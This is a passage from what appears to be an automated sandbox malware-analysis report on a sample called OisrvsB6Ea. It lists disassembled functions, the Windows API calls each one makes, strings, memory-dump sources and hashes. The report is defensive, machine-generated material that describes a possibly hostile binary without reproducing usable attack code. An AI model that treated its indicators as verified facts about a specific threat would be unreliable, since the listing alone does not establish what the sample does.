                                                                                    • Part of subcall function 0028AF98: _wcschr.LIBVCRUNTIME ref: 0028B033
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr$CompareString
                                                                                  • String ID: <$HIDE$MAX$MIN
                                                                                  • API String ID: 69343711-3358265660
                                                                                  • Opcode ID: 8e52857694d510bde37f08d127552f11acd9ebc3d9600796bfda3f09bde07773
                                                                                  • Instruction ID: cf0deb481ec069dc7db2f3ed5a66914da3883db372ec4f1539ad08edce89cbd6
                                                                                  • Opcode Fuzzy Hash: 8e52857694d510bde37f08d127552f11acd9ebc3d9600796bfda3f09bde07773
                                                                                  • Instruction Fuzzy Hash: 9631877591121AAADF25EF50CC41EEE73BCEB15350F5041A6F901E71C0EBB09EA48FA1
                                                                                  Function 0028AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0028AAD2
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0028AB01
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0028AB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease
                                                                                  • String ID: -($7(
                                                                                  • API String ID: 1429681911-1843801595
                                                                                  • Opcode ID: 605159b95152c532d5aed7c1d0ae59a0430cbaa799dd2c1f4f3bb9b9d840854b
                                                                                  • Instruction ID: 7ccdb528415e32b7273d1338e3e6f58493559a8db1c2a378373aa543f437f6cf
                                                                                  • Opcode Fuzzy Hash: 605159b95152c532d5aed7c1d0ae59a0430cbaa799dd2c1f4f3bb9b9d840854b
                                                                                  • Instruction Fuzzy Hash: 1E212A72509354AFD3019FA5EC4CE6FBFE9FB89352F04082AFA4592120D7319E548B63
                                                                                  Function 0027B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0027B9B8
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027B9D6
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027B9E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                  • String ID: %c:\
                                                                                  • API String ID: 525462905-3142399695
                                                                                  • Opcode ID: a3a7e025ee48f49f4b2396f72f0d391c053601b7e3b07548f779152fddf04bee
                                                                                  • Instruction ID: 597f04455fe4d9c3a36d63302249579196c0455f5d366d840950edab37a3aed9
                                                                                  • Opcode Fuzzy Hash: a3a7e025ee48f49f4b2396f72f0d391c053601b7e3b07548f779152fddf04bee
                                                                                  • Instruction Fuzzy Hash: 5401F963530312B99B32BB758C4AE6BB7ACEE96770B40C41AF558D6082EB30D47486B1
                                                                                  Function 0028B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028B2BE
                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0028B2D6
                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0028B304
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: GETPASSWORD1$xz,
                                                                                  • API String ID: 445417207-555921176
                                                                                  • Opcode ID: b5e7685844bd05c9fa5b42a13c10f8bb3b5615e31c6a5d66577c3db50763a4fa
                                                                                  • Instruction ID: d39bfd8691e1a4ecbf70339f03125dfafb6ed63133e6b3a0bff1af56084362e2
                                                                                  • Opcode Fuzzy Hash: b5e7685844bd05c9fa5b42a13c10f8bb3b5615e31c6a5d66577c3db50763a4fa
                                                                                  • Instruction Fuzzy Hash: 6011E136921119B6DB22AE74AD49FFF376CEF0A700F004069FA45B20C4C7B09E219B61
                                                                                  Function 0028B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadBitmapW.USER32(00000065), ref: 0028B6ED
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028B712
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028B744
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028B767
                                                                                    • Part of subcall function 0028A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0028B73D,00000066), ref: 0028A6D5
                                                                                    • Part of subcall function 0028A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A6EC
                                                                                    • Part of subcall function 0028A6C2: LoadResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A703
                                                                                    • Part of subcall function 0028A6C2: LockResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A712
                                                                                    • Part of subcall function 0028A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028B73D,00000066), ref: 0028A72D
                                                                                    • Part of subcall function 0028A6C2: GlobalLock.KERNEL32(00000000), ref: 0028A73E
                                                                                    • Part of subcall function 0028A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028A762
                                                                                    • Part of subcall function 0028A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028A7A7
                                                                                    • Part of subcall function 0028A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0028A7C6
                                                                                    • Part of subcall function 0028A6C2: GlobalFree.KERNEL32(00000000), ref: 0028A7CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                  • String ID: ]
                                                                                  • API String ID: 1797374341-3352871620
                                                                                  • Opcode ID: 43b2ada7a4315499eb61ff87bd31b965997f431395aaf37ca04449f798369f29
                                                                                  • Instruction ID: 0b9c452a06616bc2775257e8e0676b65d2225f60a39dad8820ed344ed15df25f
                                                                                  • Opcode Fuzzy Hash: 43b2ada7a4315499eb61ff87bd31b965997f431395aaf37ca04449f798369f29
                                                                                  • Instruction Fuzzy Hash: F801C43B91221267E7127B749C09A7FBB799BC0752F140016F900A72D5DF618D294BA2
                                                                                  Function 0028D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028D64B
                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0028D661
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028D675
                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0028D684
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: RENAMEDLG
                                                                                  • API String ID: 445417207-3299779563
                                                                                  • Opcode ID: 4268203265c2bc4e671d172593ed4b568c5358b1b853fb4e50bf1a30411fe1f1
                                                                                  • Instruction ID: 52b43c77d14ef055cd5707952ff9576c7b0827f40bb8cacb617f6728bff0819a
                                                                                  • Opcode Fuzzy Hash: 4268203265c2bc4e671d172593ed4b568c5358b1b853fb4e50bf1a30411fe1f1
                                                                                  • Instruction Fuzzy Hash: 9C016D377A62297BD210AF24BD0DF57775DEB5A701F014012F305A10D0D6A1AA288B36
                                                                                  Function 00297E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00297E24,?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002), ref: 00297E93
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00297EA6
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00297E24,?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297EC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: ff0dbb4d0464259894d8bb4902472ec3a219ca49044a017cf30d84276a55b77a
                                                                                  • Instruction ID: f030a544a397ec2e7bac1f423f0d506e123eb65a2f9b2140c362fc9c2918bc16
                                                                                  • Opcode Fuzzy Hash: ff0dbb4d0464259894d8bb4902472ec3a219ca49044a017cf30d84276a55b77a
                                                                                  • Instruction Fuzzy Hash: 0CF04F31A24209BBCF11DFA0EC0DB9EBFB5EB49715F0540A9F805A22A0DF309E54CA90
                                                                                  Function 0027F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027F2E4
                                                                                  • GetProcAddress.KERNEL32(002B81C8,CryptUnprotectMemory), ref: 0027F2F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                  • API String ID: 2141747552-1753850145
                                                                                  • Opcode ID: a6fdc792c7da9cdc646d35cbddf0de07aa64356f4d3f1ae43f0f330c00903ca8
                                                                                  • Instruction ID: 9ade54f9d429b97467ccf8a05c06f0b03a499dd6b3363e43e5a78544f4f85e9b
                                                                                  • Opcode Fuzzy Hash: a6fdc792c7da9cdc646d35cbddf0de07aa64356f4d3f1ae43f0f330c00903ca8
                                                                                  • Instruction Fuzzy Hash: A5E04F709247529FC760DF74A94DB01BAD46F17710F14C85DF0DA93641DEB4D5A08B50
                                                                                  Function 00292BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 2252061734-0
                                                                                  • Opcode ID: 997b05ede58ff3e96cb08daca266c9a6713f7db084e6faa75dbe3d855e29328b
                                                                                  • Instruction ID: b78fcbdac127da02824b18d99f4ff9d06c7b9f76bef41dd908c9bd43070581c7
                                                                                  • Opcode Fuzzy Hash: 997b05ede58ff3e96cb08daca266c9a6713f7db084e6faa75dbe3d855e29328b
                                                                                  • Instruction Fuzzy Hash: 1851E171A21216FFDF289F14D985BAA73A4FF14310F24412EEC05476A1D731ED68DBA0
                                                                                  Function 0029BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0029BF39
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029BF5C
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029BF82
                                                                                  • _free.LIBCMT ref: 0029BF95
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029BFA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  • Opcode ID: f679e5deba77e2eea4cd3b0b02212336dc2ed57ace2516548728f362802dadd1
                                                                                  • Instruction ID: 2344f08b96bc938670928a8a098287be80b73051a6270f94e19abab9af5fc51f
                                                                                  • Opcode Fuzzy Hash: f679e5deba77e2eea4cd3b0b02212336dc2ed57ace2516548728f362802dadd1
                                                                                  • Instruction Fuzzy Hash: 3101F7726256167F2B225AB6BD4CC7B6A6DDEC7BA0314012DFD08C2500EF60CD1289B0
                                                                                  Function 00299869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,002991AD,0029B188,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029986E
                                                                                  • _free.LIBCMT ref: 002998A3
                                                                                  • _free.LIBCMT ref: 002998CA
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 002998D7
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 002998E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 84ff7420ab093f5cf1fa8ea38069f5b148a34882327fb2bc10d9c04f7d3d8521
                                                                                  • Instruction ID: b833c4db8d9e6d735209de0922275ca4d51ddc7489266501f6fb4b84fb52ea77
                                                                                  • Opcode Fuzzy Hash: 84ff7420ab093f5cf1fa8ea38069f5b148a34882327fb2bc10d9c04f7d3d8521
                                                                                  • Instruction Fuzzy Hash: A40144361306026BCF126B3D7C8992B262DEFD3370725003DF50592292EE708C724561
                                                                                  Function 00280EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 002811CF: ResetEvent.KERNEL32(?), ref: 002811E1
                                                                                    • Part of subcall function 002811CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002811F5
                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00280F21
                                                                                  • CloseHandle.KERNEL32(?,?), ref: 00280F3B
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00280F54
                                                                                  • CloseHandle.KERNEL32(?), ref: 00280F60
                                                                                  • CloseHandle.KERNEL32(?), ref: 00280F6C
                                                                                    • Part of subcall function 00280FE4: WaitForSingleObject.KERNEL32(?,000000FF,00281101,?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FEA
                                                                                    • Part of subcall function 00280FE4: GetLastError.KERNEL32(?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 1868215902-0
                                                                                  • Opcode ID: 990474df7f8bde81a6d2d40c8bd890cd25f955b884e471ca5ab4172d06bd8407
                                                                                  • Instruction ID: c5e395e5d707da0c0d2aa36ffc708dde6bd65628c47ce326fcb74c77630246ba
                                                                                  • Opcode Fuzzy Hash: 990474df7f8bde81a6d2d40c8bd890cd25f955b884e471ca5ab4172d06bd8407
                                                                                  • Instruction Fuzzy Hash: 60019276010740EFC722AB64EC88BC6FBA9FB09710F004929F25A525A0CF757A58CB50
                                                                                  Function 0029C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0029C817
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029C829
                                                                                  • _free.LIBCMT ref: 0029C83B
                                                                                  • _free.LIBCMT ref: 0029C84D
                                                                                  • _free.LIBCMT ref: 0029C85F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b8862d3cfa1dbdbfa11efba7e2b2ca77a018b49bd4ad13b546bd8d053b503bab
